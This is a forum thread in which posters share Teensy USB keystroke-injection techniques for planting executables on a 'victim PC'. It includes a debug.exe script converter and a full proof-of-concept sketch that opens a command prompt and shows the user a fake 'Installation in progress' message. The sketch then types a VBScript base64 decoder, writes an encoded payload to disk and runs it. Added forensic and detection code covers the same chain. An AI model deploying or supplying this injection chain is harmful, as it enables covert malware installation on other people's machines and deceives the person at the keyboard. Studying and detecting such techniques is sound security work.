
[Version 1] Some Of My Ideas And Workings


Sud0x3


I bought a Teensy a few weeks back and here are some of my thoughts and ideas; I'm going to try not to ramble on.

IDEA 1: Build an executable on the victim PC

Here I basically wanted to try and find a way to create, make or build! an executable from instructions sent from the device. The only way of doing this that I could think of was using the Windows debug trick.

So, using a module from http://sqlmap.sourceforge.net/, I converted an executable into a format that Windows debug can read and convert from a text file back into an executable. So I had the lines of code; I needed to get them onto the PC. I decided I'd use the Teensy to write each line from the file into a new Notepad document on the victim's PC, then save and do the conversion on the file.

dbgtool.py - Portable executable to ASCII debug script converter

Copyright © 2006-2010 sqlmap developers

#!/usr/bin/env python

"""
$Id$

dbgtool.py - Portable executable to ASCII debug script converter

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import os
import sys

from optparse import OptionError
from optparse import OptionParser

def convert(inputFile):
    fileStat = os.stat(inputFile)
    fileSize = fileStat.st_size

    # debug.exe edits a single 64 KB segment starting at offset 0x100
    if fileSize > 65280:
        print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
        sys.exit(1)

    # 'n' names the output file, 'r cx' + the next line set its length,
    # 'f' zero-fills the segment so only non-zero bytes need an 'e' line
    script     = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
    script    += "%x\nf 0100 ffff 00\n" % fileSize
    scrString  = ""
    counter    = 256
    counter2   = 0

    with open(inputFile, "rb") as fp:
        fileContent = fp.read()

    # iterating over bytes yields ints, so no struct.unpack is needed
    for unsignedFileChar in fileContent:
        if unsignedFileChar != 0:
            counter2 += 1

            if not scrString:
                scrString  = "e %0x %02x" % (counter, unsignedFileChar)
            else:
                scrString += " %02x" % unsignedFileChar
        elif scrString:
            script   += "%s\n" % scrString
            scrString = ""
            counter2  = 0

        counter += 1

        # keep each 'e' line to at most 20 bytes
        if counter2 == 20:
            script    += "%s\n" % scrString
            scrString  = ""
            counter2   = 0

    # flush a trailing run of non-zero bytes (lost in the original loop)
    if scrString:
        script += "%s\n" % scrString

    script += "w\nq\n"

    return script

def main(inputFile, outputFile):
    if not os.path.isfile(inputFile):
        print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
        sys.exit(1)

    script = convert(inputFile)

    if outputFile:
        with open(outputFile, "w") as fpOut:
            fpOut.write(script)
    else:
        print(script)

if __name__ == "__main__":
    usage   = "%s -i <input file> [-o <output file>]" % sys.argv[0]
    parser  = OptionParser(usage=usage, version="0.1")

    try:
        parser.add_option("-i", dest="inputFile", help="Input binary file")

        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")

        (args, _) = parser.parse_args()

        if not args.inputFile:
            parser.error("Missing the input file, -h for help")

    except (OptionError, TypeError) as e:
        parser.error(e)

    inputFile  = args.inputFile
    outputFile = args.outputFile

    main(inputFile, outputFile)

I tried using the Keyboard.print command: Keyboard.print("n WirelessKeyView_exe");

With help, I put together a script that would take the strings of a file and embed each of them in a Keyboard.print string.

#!/usr/bin/python

# Wrap every line of the debug script in a Keyboard.print("...") call.
with open('debug.txt', 'r') as src, open('output.txt', 'a') as dst:
    for line in src:
        dst.write('Keyboard.print("' + line.rstrip('\n') + '");\n')

r cx
bc00
f 0100 ffff 00
e 100 4d 5a 90
e 104 03
e 108 04
e 10c ff ff
e 110 b8
e 118 40
e 13c e0
e 140 0e 1f ba 0e
e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61
e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44
e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24
e 180 12 f2 d9 dc 56 93 b7 8f 56 93 b7 8f 56 93 b7 8f ac b0 f7 8f

Keyboard.print("r cx");
Keyboard.print("bc00");
Keyboard.print("f 0100 ffff 00");
Keyboard.print("e 100 4d 5a 90");
Keyboard.print("e 104 03");
Keyboard.print("e 108 04");
Keyboard.print("e 10c ff ff");
Keyboard.print("e 110 b8");
Keyboard.print("e 118 40");
Keyboard.print("e 13c e0");
Keyboard.print("e 140 0e 1f ba 0e");
Keyboard.print("e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61");
Keyboard.print("e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44");

After getting this far I tried to compile the project, and it seems to be too many lines of code for the Teensy to handle in the software; I'll be honest, I don't have a clue.

Here is the error I got when compiling:

elf section .data is not within region data

elf section .bss will not fit in region data

elf section .data is not within region data

./desktop/arduino-0018/hardware/tools/avr/bin/../lib/gcc/avr/4.3.2/../../../../avr/bin/ld.exe: region data overflowed by 43740 bytes

IDEA 2: Some ideas for scripts

Off the top of my head; not all may be viable or sane!

+ Enter BIOS: run through key combinations to put the PC into the BIOS configuration

+ Bypass screensaver: again, run through key combinations to bypass the screensaver

+ Enumeration: a script to do enumeration through the command line using only the PC's programs. The Teensy would generate a batch file through the same methods discussed above, when I converted a file to a readable format for the Teensy to use.

+ Payload switcher on an LCD screen

+ more to come...

Edited by Sud0x3
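As an added example (not from the thread), a forensic helper that replays a dbgtool-style debug.exe script in pure Python, so an analyst who finds such a text file on a host can recover the bytes it would have assembled without running debug.exe; the second function counts the RAM the Keyboard.print("...") approach above needs, which is the "region data" the linker error reports as overflowed. The sample script is constructed, and the replay assumes only the commands dbgtool emits (n, r cx, f, e, w, q).

```python
# Constructed sample: the head of a DOS/PE header as dbgtool.py would emit it
# (the 'n' line names the output file, 'r cx' + next line set its length).
SAMPLE_SCRIPT = """n sample_exe
r cx
10
f 0100 ffff 00
e 100 4d 5a 90
e 104 03
e 108 04
e 10c ff ff
w
q
"""

def replay_debug_script(script):
    """Replay a dbgtool-style debug.exe script and return (filename, bytes)."""
    name, size = None, None
    seg = bytearray(0x10000)            # debug.exe edits one 64 KB segment
    expect_cx = False
    for line in script.splitlines():
        line = line.strip()
        if not line:
            continue
        if expect_cx:                   # the value typed after 'r cx'
            size, expect_cx = int(line, 16), False
        elif line.startswith("n "):
            name = line[2:]
        elif line == "r cx":
            expect_cx = True
        elif line.startswith("f "):     # f <start> <end> <value>: fill range
            start, end, val = (int(x, 16) for x in line.split()[1:])
            seg[start:end + 1] = bytes([val]) * (end - start + 1)
        elif line.startswith("e "):     # e <offset> <b0> <b1> ...: enter bytes
            parts = line.split()
            off = int(parts[1], 16)
            data = bytes(int(h, 16) for h in parts[2:])
            seg[off:off + len(data)] = data
        elif line not in ("w", "q"):    # w writes CX bytes from 0x100, q quits
            raise ValueError("unexpected debug command: %r" % line)
    if name is None or size is None:
        raise ValueError("script lacks the 'n' or 'r cx' command")
    return name, bytes(seg[0x100:0x100 + size])

def literal_data_bytes(script):
    """RAM needed if every line becomes a Keyboard.print("...") literal: on AVR
    such literals are copied into .data at boot (chars + NUL), hence the overflow."""
    return sum(len(l) + 1 for l in script.splitlines() if l.strip())
```

Storing the lines in flash with PROGMEM and copying one at a time into a small buffer, as the sketch later in this thread does, is what keeps them out of .data.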

I've been doing the same thing.

http://www.toolcrypt.org/tools/dbgtool/index.html, using this instead of the Python script.

I've been running into the same kind of issues; the code compiles OK but I don't think the Teensy's memory can handle that much text at once. Trying to figure out a loop for it to take chunks of the debug script at a time.


I think I might have found the solution to help with getting an executable on the box using Teensy and nothing but the HID drivers of the OS. When I was researching around I found a VBScript for server side conversion of a file to base64. I then changed it around a bit and have adapted it to my Teensy. Right now, I have posted a tutorial on how to convert any file to ASCII Base64 encoded text then decode it using nothing but VBScripts. I am currently in the process of writing the tutorial on adapting this logic to the Teensy.

But to get you started, here is the tutorial on how to convert any file to ASCII base64 encoding: http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html


Hi all,

I was working on the same topic, so I can share my PoC.

I used the same encoding technique that you are talking about (base64 in VBS), writing the payload and the VBS on the victim machine.

Here is the code; it works fine for me with an ASM downloader of 1 KB (approx. 3 sec. to execute the loop):

#include <phukdlib.h>
#include <avr/pgmspace.h>
//
// binary copy download and execute payload
//
// 25.05.2011


char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls" ;


// put the encoded exe payload here
// (const char ... PROGMEM replaces the prog_char typedef, which newer avr-libc no longer provides)
const char string_0[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls";
const char string_1[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_2[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_3[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_4[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_5[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_6[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls";
const char string_7[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_8[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_9[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
const char string_19[] PROGMEM = "echo AA== >> pl.dat";


// Then set up a table to refer to your strings (the table itself also lives in flash).

const char *const string_table[] PROGMEM =
{   
  string_0,
  string_1,
  string_2,
  string_3,
  string_4,
  string_5,
  string_6,
  string_7,
  string_8,
  string_9,
  string_10,
  string_11,
  string_12,
  string_13,
  string_14,
  string_15,
  string_16,
  string_17,
  string_18,
  string_19};

char buffer[100];   


void setup() {
  delay(20000);
  pinMode(11, OUTPUT);
  digitalWrite(11, HIGH);
  delay(50);
  sendWinKey () ;
  delay(500);
  Keyboard.println("cmd"); //"cmd /t:ab"
  //delay(500);
  //ShrinkCurWinMSWIN();
  delay(500);
  Keyboard.print("msg ");
  sendAsterixKey ();
  Keyboard.println(" Installation in progress... - Please Wait "); // opening quote was missing in the post
  delay(50);
  sendVbs();
}

void loop()
{
}

void sendVbs () {
  Keyboard.println(vbsString);

  // copy each flash-resident chunk into the 100-byte RAM buffer and type it
  for (int i = 0; i < 20; i++) // 20 entries in string_table
  {
    strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i])));
    Keyboard.println(buffer);
    delay(50);
  }

  Keyboard.println("cscript script.vbs pl.dat payload.exe & cls"); // decode pl.dat into payload.exe
  Keyboard.println("payload.exe & cls"); // run payload
  Keyboard.println("exit"); // close the command prompt
}

void sendPlusKey () {
  Keyboard.set_key1(KEYPAD_PLUS);
  Keyboard.send_now();
  Keyboard.set_key1(0); // reset key state
  Keyboard.send_now();
}

void sendAsterixKey () {
  Keyboard.set_key1(KEYPAD_ASTERIX);
  Keyboard.send_now();
  Keyboard.set_key1(0); // reset key state
  Keyboard.send_now();
}

void sendWinKey () {
  Keyboard.set_modifier(128); // 0x80 = right GUI (Windows) bit of the HID modifier byte
  Keyboard.set_key1(KEY_R);   // Win+R opens the Run dialog
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

Any ideas are welcome.

Cheers.

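A detection example for the approach of the last two posts (base64 text typed in with echo, decoded by a VBScript, then executed), written for this thread and not part of any poster's code. It assumes Sysmon-style process-creation records with the fields shown, constructed here to mirror the keystroke sequence in the sketch above; because echo and cls are cmd.exe builtins that leave no process events, it keys on the cscript.exe call whose third argument is an .exe and the later launch of that same .exe under the same cmd.exe.

```python
import re
from collections import defaultdict, namedtuple

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (not real telemetry): time in seconds, parent PID, PID, parent image,
# image, command line. PIDs 412-440 replay the sketch's keystroke sequence;
# PIDs 500-510 are a benign script run included for contrast.
Event = namedtuple("Event", "ts ppid pid parent image cmdline")
SAMPLE_EVENTS = [
    Event(0, 100, 412, "explorer.exe", "cmd.exe", "cmd"),
    Event(1, 412, 420, "cmd.exe", "msg.exe", "msg * Installation in progress... - Please Wait"),
    Event(2, 100, 500, "explorer.exe", "cmd.exe", "cmd /c backup.cmd"),
    Event(3, 500, 510, "cmd.exe", "cscript.exe", "cscript //nologo backup.vbs"),
    Event(4, 412, 431, "cmd.exe", "cscript.exe", "cscript script.vbs pl.dat payload.exe"),
    Event(5, 412, 440, "cmd.exe", "payload.exe", "payload.exe"),
]

# cscript <any>.vbs <input> <output>.exe : the argument order the thread's
# decoder script expects (inFile = arguments(0), outFile = arguments(1)).
CSCRIPT_DECODER = re.compile(r"\S+\.vbs\s+\S+\s+(\S+\.exe)\b", re.IGNORECASE)

def detect_vbs_decode_then_run(events, window=60):
    """Return [(cmd_pid, exe)] for every cmd.exe that runs cscript on a .vbs
    with an .exe output argument and then launches that .exe within `window`
    seconds."""
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)
    hits = []
    for ppid, evs in children.items():
        evs.sort(key=lambda e: e.ts)
        for i, ev in enumerate(evs):
            if ev.parent.lower() != "cmd.exe" or ev.image.lower() != "cscript.exe":
                continue
            m = CSCRIPT_DECODER.search(ev.cmdline)
            if not m:
                continue
            # normalise a possibly quoted or path-qualified target to its basename
            exe = m.group(1).strip('"').rsplit("\\", 1)[-1].lower()
            for later in evs[i + 1:]:
                if later.ts - ev.ts > window:
                    break
                if later.image.lower() == exe:
                    hits.append((ppid, exe))
                    break
    return hits
```

The 20 second startup delay and the msg.exe pop-up from the same cmd.exe are further features a rule could weigh, but the cscript-then-exe pair is the part the technique cannot drop.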
